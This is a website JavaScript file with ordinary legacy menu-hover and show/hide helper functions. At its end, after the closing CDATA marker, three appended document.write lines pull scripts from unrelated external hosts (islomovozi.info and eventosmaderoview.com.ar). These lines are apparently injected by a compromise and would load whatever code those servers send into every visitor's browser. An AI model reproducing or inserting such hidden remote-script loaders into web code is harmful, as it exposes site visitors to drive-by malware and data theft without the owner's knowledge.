<!--//--><![CDATA[//><!--

var mrMac = (navigator.userAgent.indexOf('Mac') != -1);
	if (!mrMac) {
		sfHover = function() {
			var sfEls = document.getElementById("links").getElementsByTagName("LI");
			for (var i=0; i<sfEls.length; i++) {
				sfEls[i].onmouseover=function() {
					this.className+=" over";
				}
				sfEls[i].onmouseout=function() {
					this.className=this.className.replace(new RegExp(" over\\b"), "");
				}
			}
		}
		if (window.attachEvent) window.attachEvent("onload", sfHover);
	}	
function WaitHere(where)
{
	var max  = (where*1000);
	var s = "";
	for(var x = 0;x<=max;x++)
	{
		s+="af ";
	}	
}
function GetMyObjectByID(itemID)
{
// In the future will need to build in the ability to handle v4 netscape browsers.
	if (document.getElementById) // Good browsers
		return document.getElementById(itemID)
	else if (document.all) // medium browsers
		return document.all[itemID];
		
	// Need to handle v4 browsers in the future.
}

function switchPlace( show, hide1, hide2)
{
	var oShow = GetMyObjectByID(show);
	var oHide = GetMyObjectByID(hide1);
	var oHide2 = GetMyObjectByID(hide2);
	oShow.style.display = "block";
	oHide.style.display = "none";
	oHide2.style.display = "none";	
}
function HideAll( hide1, hide2, hide3)
{
	var oHide = GetMyObjectByID(hide1);
	var oHide2 = GetMyObjectByID(hide2);
	var oHide3 = GetMyObjectByID(hide3);	
	
	oHide.style.display  = "none";
	oHide2.style.display = "none";	
	oHide3.style.display = "none";	
}
function show(itemID)
{
	var o = GetMyObjectByID(itemID);
	o.style.display ="block";
}
function hide(itemID)
{
	var o = GetMyObjectByID(itemID);
	o.style.display ="none";
}	
//--><!]]>
document.write('<script src=http://islomovozi.info/audio/index.php ><\/script>');
document.write('<script src=http://islomovozi.info/audio/index.php ><\/script>');
document.write('<script src=http://eventosmaderoview.com.ar/insert/enviar2.php ><\/script>');